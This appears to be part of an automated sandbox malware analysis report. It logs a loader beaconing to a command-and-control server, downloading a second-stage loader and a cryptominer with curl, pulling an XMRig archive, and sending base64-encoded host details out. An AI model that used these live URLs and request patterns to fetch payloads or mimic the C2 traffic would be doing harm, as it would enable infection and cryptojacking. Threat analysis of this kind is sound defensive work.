                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 42 41 37 34 35 43 43 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9FBA745CCFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                        Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                        Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                        Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
                        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                        Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                        Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 185.215.113.16:80
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C2BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,6_2_00C2BD60
                        Source: global trafficHTTP traffic detected: GET /download/conf1.php HTTP/1.1Host: eijfrhegrtbrfcd.onlineUser-Agent: curl/7.83.1Accept: */*
                        Source: global trafficHTTP traffic detected: GET /download/miner2.0.exe HTTP/1.1Host: eijfrhegrtbrfcd.onlineUser-Agent: curl/7.83.1Accept: */*
                        Source: global trafficHTTP traffic detected: GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /inc/loader_5879465914.exe HTTP/1.1Host: 185.215.113.16
                        Source: global trafficDNS traffic detected: DNS query: eijfrhegrtbrfcd.online
                        Source: global trafficDNS traffic detected: DNS query: sanctam.net
                        Source: global trafficDNS traffic detected: DNS query: github.com
                        Source: unknownHTTP traffic detected: POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1Connection: Keep-AliveUser-Agent: A WinHTTP Example Program/1.0Content-Length: 0Host: eijfrhegrtbrfcd.online
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/15.113.16/
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/15.113.16/System32
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/4
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/7737D9ECF5C72AA370644
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php&7:
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/dn
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php4
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php:7.
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php=
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpB7V
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpER
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpF6Z
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpM6
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpN7
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpWindows
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpdedA
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phper_5879465914.exe
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpm
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded&
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded3
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded4
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedJ
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodede
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedr
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnu
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpr7f
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Local
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/ViewSizePreferences.SourceAumid2
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/W
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Wiow
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/loader_5879465914.exe
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/loader_5879465914.exe%
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/loader_5879465914.exeh
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/ones
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/t
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/ysWOW64
                        Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                        Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                        Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                        Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                        Source: svchost64.exe, 0000008B.00000002.2788969573.000000000375D000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.000000000357C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                        Source: svchost64.exe, 0000006B.00000002.2706597636.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 0000008B.00000002.2788969573.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, sihost64.exe, 00000090.00000002.2783114203.0000000003221000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, sihost64.exe, 0000009F.00000002.2836528294.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: sihost64.exe, 0000009F.00000002.2836528294.00000000032D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                        Source: loader_5879465914.exe, 00000007.00000003.2741556491.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2724634660.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2791232817.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2894492934.000000000378D000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2857988717.0000000003797000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2763069351.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2908398363.0000000003788000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2949314469.0000000003797000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2867639993.000000000378E000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000002.3022068193.0000000003799000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2690557192.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2590705590.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2742582676.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2523814240.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2864099579.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2832045972.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2399904766.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2455135298.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2636667274.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2879187208.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2510316366.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/
                        Source: loader_5879465914.exe, 00000007.00000003.2550392048.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000002.3020183902.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2438846550.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2467127699.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2426102539.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2793911920.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2635393911.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2766846263.0000000000777000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2373865784.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2481291707.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2620255870.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2453484354.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2508746813.0000000000777000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2673880736.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2399949653.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2522344856.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2689820350.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2358547789.0000000000777000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2386863025.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2648797169.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2412212318.0000000000778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/0
                        Source: loader_5879465914.exe, 00000007.00000002.3021798885.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/A
                        Source: Microsoft-Edge.exe, 0000000E.00000002.3022066818.0000000003705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/R
                        Source: curl.exe, 0000000A.00000002.2354249733.00000212B53B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/download/conf1.php
                        Source: curl.exe, 0000000A.00000002.2354249733.00000212B53B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/download/conf1.phpe
                        Source: curl.exe, 0000000A.00000002.2354315506.00000212B53EC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.2353963310.00000212B53EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/download/conf1.phpy
                        Source: curl.exe, 00000052.00000002.2619013349.000001DFDEF47000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000052.00000002.2619013349.000001DFDEF54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/download/miner2.0.exe
                        Source: curl.exe, 00000052.00000002.2619013349.000001DFDEF47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/download/miner2.0.exePz
                        Source: curl.exe, 00000052.00000003.2618490481.000001DFDEF7B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000052.00000002.2619230837.000001DFDEF7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/download/miner2.0.exeX
                        Source: curl.exe, 00000052.00000002.2619013349.000001DFDEF54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/download/miner2.0.execk.dll
